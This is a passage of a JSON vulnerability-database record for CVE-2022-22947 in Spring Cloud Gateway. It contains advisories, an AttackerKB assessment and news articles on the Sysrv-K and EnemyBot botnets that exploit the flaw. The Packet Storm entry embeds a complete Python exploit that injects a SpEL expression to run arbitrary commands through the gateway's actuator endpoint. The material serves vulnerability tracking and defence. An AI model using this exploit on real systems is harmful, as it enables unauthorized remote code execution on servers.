"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-27T14:22:15", "id": "429EEEBB-0204-5B44-AA0F-42A7D4511867", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T15:04:33", "description": "# CVE-2022-22947-POC\n\u6b22\u8fce\u5173\u6ce8chaosec\u516c\u4f17\u53f7\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\n\nCVE-2022-22947\u6279\u91cf\u68c0\u6d4b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T11:31:00", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-30T02:01:50", "id": "7072D83E-3183-5CFC-ABEB-1C5F5932A217", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:49:39", "description": "# CVE-2022-22947-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-29T01:07:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-29T01:08:13", "id": "6278B542-9BD2-5DE4-B950-A60CEBEE6DB1", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-29T08:33:21", "description": "# CVE-2022-22947\n# SpringCloudGatewayRCE\n\n## Code By:Jun_s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T11:53:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-29T06:10:25", "id": "C4845BA2-1E07-5E0D-AFF4-D608A325EB8B", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:27:13", "description": "### Spring Cloud Gateway \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n> \u8be5\u6f0f\u6d1e\u5bf9\u4e8e\u7ebf\u4e0a\u4e1a\u52a1\u98ce\u9669\u8f83\u9ad8\uff0c\u5207\u52ff\u8fdb\u884c\u672a\u6388\u6743\u626b\u63cf\n\n##...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T06:38:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2022-22947"], "modified": "2022-04-05T11:49:23", "id": "FF2EF58E-53AA-5B60-9EA1-4B5C29647395", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-06-03T19:56:51", "description": "In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\n \n**Recent assessments:** \n \n**egalinkin-r7** at June 02, 2022 6:29pm UTC reported:\n\nCVE-2022-22947 is a remote code execution vulnerability in Spring Cloud Gateway that is currently being exploited in the wild. The vulnerable condition stems from Spring Expression Language (SpEL) expressions being passed to the StandardEvaluationContext context. This means that any valid SpEL expression passed to the context is executed.\n\nWyatt Dahlenberg provided a proof of concept exploit on his [blog](<https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>), which works on crafted vulnerable applications. In order to expose the interface, you need to modify the applications.properties file for an application using the Spring Cloud Gateway, suggesting that exposure of the vulnerable API is both non-standard and relatively uncommon.\n\nTelemetry from Rapid7\u2019s Project Heisenberg reveals a small number of exploit attempts (and scanners looking for vulnerable applications) over the last two months. This suggests that the scale of exploitation is low at this time.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-22947", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-03T00:00:00", "id": "AKB:9AE1A02C-AB77-47D3-925D-16F61A76B572", "href": "https://attackerkb.com/topics/0e2mvfWUQa/cve-2022-22947", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-12T00:11:11", "description": "spring-cloud-gateway is vulnerable to code injection. With Gateway Actuator endpoint setting enabled, an attacker is able to inject malicious code through the exposed actuator endpoint. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T08:46:00", "type": "veracode", "title": "Code Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-20T05:51:22", "id": "VERACODE:34482", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34482/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-03-07T16:41:25", "description": "", "cvss3": {}, "published": "2022-03-07T00:00:00", "type": "packetstorm", "title": "Spring Cloud Gateway 3.1.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-07T00:00:00", "id": "PACKETSTORM:166219", "href": "https://packetstormsecurity.com/files/166219/Spring-Cloud-Gateway-3.1.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) \n# Google Dork: N/A \n# Date: 03/03/2022 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://spring.io/ \n# Software Link: https://spring.io/projects/spring-cloud-gateway \n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 \n# Tested on: 3.1.0 \n# CVE : CVE-2022-22947 \n \nimport random \nimport string \nimport requests \nimport json \nimport sys \nimport urllib.parse \nimport base64 \n \nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} \nproxies = { \n'http': 'http://172.29.32.1:8081', \n'https': 'http://172.29.32.1:8081', \n} \nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) \n \ndef exploit(url, command): \n \npayload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"} \n \ncommandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') \n \nrbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) \nif(rbase.status_code == 201): \nprint(\"[+] Stage deployed to /actuator/gateway/routes/\"+id) \nprint(\"[+] Executing command...\") \nr = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) \nif(r.status_code == 200): \nprint(\"[+] getting result...\") \nr = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) \nif(r.status_code == 200): \nget_response = r.json() \nclean(url, id) \nreturn get_response['filters'][0].split(\"'\")[1] \nelse: \nprint(\"[-] Error: Invalid response\") \nclean(url, id) \nexit(1) \nelse: \nclean(url, id) \nprint(\"[-] Error executing command\") \n \n \ndef clean(url, id): \nremove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) \nif(remove.status_code == 200): \nprint(\"[+] Stage removed!\") \nelse: \nprint(\"[-] Error: Fail to remove stage\") \n \ndef banner(): \nprint(\"\"\" \n################################################### \n# # \n# Exploit for CVE-2022-22947 # \n# - Carlos Vieira (Crowsec) # \n# # \n# Usage: # \n# python3 exploit.py <url> <command> # \n# # \n# Example: # \n# python3 exploit.py http://localhost:8080 'id' # \n# # \n################################################### \n\"\"\") \n \ndef main(): \nbanner() \nif len(sys.argv) != 3: \nprint(\"[-] Error: Invalid arguments\") \nprint(\"[-] Usage: python3 exploit.py <url> <command>\") \nexit(1) \nelse: \nurl = sys.argv[1] \ncommand = sys.argv[2] \nprint(exploit(url, command)) \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166219/springcloudgw310-exec.txt"}], "threatpost": [{"lastseen": "2022-05-17T14:11:10", "description": "Unpatched vulnerabilities in the Spring Framework and WordPress plugins are being exploited by cybercriminals behind the Sysrv botnet to target Linux and Windows systems. The goal, according to researchers, is to infect systems with cryptomining malware.\n\nThe botnet variant is being called Sysrv-K by Microsoft Security Intelligence researchers that [posted a thread](<https://twitter.com/MsftSecIntel/status/1525158219206860801?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1525158219206860801%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https://securityaffairs.co/wordpress/131290/cyber-crime/microsoft-sysrv-botnet-new-exploits.html>) on Twitter revealing details of the botnet variant.\n\n> We encountered a new variant of the Sysrv botnet, known for exploiting vulnerabilities in web apps and databases to install coin miners on both Windows and Linux systems. The new variant, which we call Sysrv-K, sports additional exploits and can gain control of web servers.\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [May 13, 2022](<https://twitter.com/MsftSecIntel/status/1525158219206860801?ref_src=twsrc%5Etfw>)\n\nThe Spring Cloud is an open-source library that eases the process of developing the JVM application for the cloud and the Spring Cloud Gateway provides a library for building API Gateways for Spring and Java.\n\nThe CVE-2022-22947 is a code injection vulnerability in the Spring Cloud Gateway library and an attacker can perform remote code execution (RCE) on unpatched hosts. The flaw affected the [VMware](<https://tanzu.vmware.com/security/cve-2022-22947>) and [Oracle](<https://www.oracle.com/security-alerts/cpuapr2022.html>) products and it has been marked as critical by both the vendors.\n\n## **Working of Sysrv-K**\n\nThe Microsoft security intelligence team warned that Sysrv-K can gain control of the web servers by scanning the internet for various vulnerabilities to install itself. The vulnerabilities range from RCE to an arbitrary file download and path traversal to remote file disclosure.\n\nThe security researcher at [Lacework Labs](<https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/>) and [Juniper Threat Labs](<https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence>) observed two main components of malware that is to spread itself across networks by scanning the internet for vulnerable systems and installing the XMRig cryptocurrency miner (used for mining Monero) following a surge of activity in March 2021.\n\nThe new feature of Sysrv-K is that it scans for WordPress config files and their backups to steal credentials and gain access to the webserver. Apart from this \u201cSysvr-K has updated communication capabilities, including the ability to use a Telegram bot\u201d Microsoft added.\n\n\u201cLike older variants, Sysrv-K scans for SSH keys, IP addresses, and host names, and then attempts to connect to other systems in the network via SSH to deploy copies of itself. This could put the rest of the network at risk of becoming part of the Sysrv-K botnet\u201d the Microsoft security intelligence team reported.\n\nMicrosoft advised the organizations to secure internet-facing Linux or Windows systems, timely apply security updates, and protect credentials. \u201cMicrosoft Defender for Endpoint detects Sysrv-K and older Sysrv variants, as well as related behavior and payloads,\u201d they added.\n\nThe [critical RCE, Worms, and 6 Zero-days](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>) including (CVE-2022-22947) were faced by Microsoft in January 2022.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T13:53:19", "type": "threatpost", "title": "Sysrv-K Botnet Targets Windows, Linux", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-17T13:53:19", "id": "THREATPOST:137878F5B0776A981FB6046E1C674926", "href": "https://threatpost.com/sysrv-k-botnet-targets-windows-linux/179646/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T12:26:24", "description": "A rapidly evolving IoT malware dubbed \u201cEnemyBot\u201d is targeting content management systems (CMS), web servers and Android devices. Threat actor group \u201cKeksec\u201d is believed behind the distribution of the malware, according to researchers.\n\n\u201cServices such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,\u201d reported [AT&amp;T Alien labs](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a recent post. \u201cThe malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\u201d they added.\n\n## **EnemyBot Working**\n\nThe Alien lab research team study found four main sections of the malware.\n\nThe first section is a python script \u2018cc7.py\u2019, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file \u201cupdate.sh\u201d is created and used to spread the malware to vulnerable targets.\n\nThe second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.\n\nThe third module is obfuscation segment \u201chide.c\u201d and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and \u201ceach char is replaced with a corresponding char in the table\u201d according to researchers.\n\nThe last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.\n\nAT&amp;T researcher\u2019s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an \u201cadb_infect\u201d function that is used to attack Android devices.\n\nADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.\n\n\u201cIn case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,\u201d said the researcher.\n\n\u201cKeksec\u2019s EnemyBot appears to be just starting to spread, however due to the authors\u2019 rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,\u201d the researchers added.\n\nThis Linux-based botnet EnemyBot was first discovered by [Securonix ](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>)in March 2022, and later in-depth analysis was done by [Fortinet](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>).\n\n## **Vulnerabilities Currently Exploited by EnemyBot**\n\nThe AT&amp;T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.\n\nThe list includes [Log4shell vulnerability ](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)), [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices ([CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.\n\n * [Log4shell](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) vulnerability \u2013 [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n * [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices \u2013 [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)\n * Spring Cloud Gateway \u2013 [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)\n * TOTOLink A3000RU wireless router \u2013 [CVE-2022-25075](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25075>)\n * Kramer VIAWare \u2013 [CVE-2021-35064](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>)\n\n\u201cThis indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,\u201d the researcher explained.\n\n## **Recommended Actions **\n\nThe Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices\u2019 exposure to the internet.\n\nAnother action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T12:24:44", "type": "threatpost", "title": "EnemyBot Malware Targets Web Servers, CMS Tools and Android OS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35064", "CVE-2021-44228", "CVE-2021-45046", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-25075"], "modified": "2022-05-31T12:24:44", "id": "THREATPOST:F12423DD382283B0E48D4852237679FC", "href": "https://threatpost.com/enemybot-malware-targets-web-servers-cms-tools-and-android-os/179765/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-05-12T17:56:22", "description": "A remote code execution vulnerability exists in Spring Cloud Gateway. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:00:00", "type": "checkpoint_advisories", "title": "Spring Cloud Gateway Remote Code Execution (CVE-2022-22947)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-12T00:00:00", "id": "CPAI-2022-0107", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-04-27T00:08:59", "description": "In Spring Cloud Gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote attacker could make a maliciously crafted request resulting in arbitrary remote execution on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T00:00:15", "type": "github", "title": "Code injection in Spring Cloud Gateway", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-26T20:56:54", "id": "GHSA-3GX9-37WW-9QW6", "href": "https://github.com/advisories/GHSA-3gx9-37ww-9qw6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-06-10T05:04:22", "description": "In Spring Cloud Gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote attacker could make a maliciously crafted request resulting in arbitrary remote execution on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T00:00:15", "type": "osv", "title": "Code injection in Spring Cloud Gateway", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-10T02:10:37", "id": "OSV:GHSA-3GX9-37WW-9QW6", "href": "https://osv.dev/vulnerability/GHSA-3gx9-37ww-9qw6", "cvss": {"score": 6.8, 